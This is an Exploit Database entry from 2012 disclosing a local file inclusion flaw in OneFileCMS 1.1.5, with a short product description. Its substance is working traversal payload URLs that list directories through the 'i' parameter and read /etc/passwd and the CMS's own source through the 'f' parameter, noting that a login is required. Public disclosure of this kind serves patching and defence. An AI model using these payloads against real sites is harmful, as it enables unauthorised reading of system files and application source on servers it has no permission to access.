OneFileCMS 1.1.5 - Local File Inclusion

EDB-ID:

18607

CVE:



Author:

mr.pr0n

Type:

webapps


Platform:

PHP

Date:

2012-03-16


# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability
# Google Dork: --
# Date: 16/03/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr
# Software Link: https://github.com/rocktronica/OneFileCMS
# Version: OneFileCMS v.1.1.5
# Tested on: Linux Fedora 14

===============
Description
===============
OneFileCMS is just that. It's a flat, light, one file CMS (Content
Management System) entirely contained in an easy-to-implement, highly
customizable, database-less PHP script. Coupling a utilitarian code editor
with all the basic necessities of an FTP application, OneFileCMS can
maintain a whole website completely in-browser without any external
programs.

=======================================================
[!] All vulnerabilities requires authentication. [!]
=======================================================


Directory Listing, using the "i" parameter:
http://TARGET/onefilecms/onefilecms.php?i=../../../../


Read local files, using the "f" parameter:
http://TARGET/onefilecms/onefilecms.php?f=../../../../etc/passwd
http://TARGET/onefilecms/onefilecms.php?f=../../../../var/www/html/onefilecms/onefilecms.php

-- 
http://ghostinthelab.wordpress.com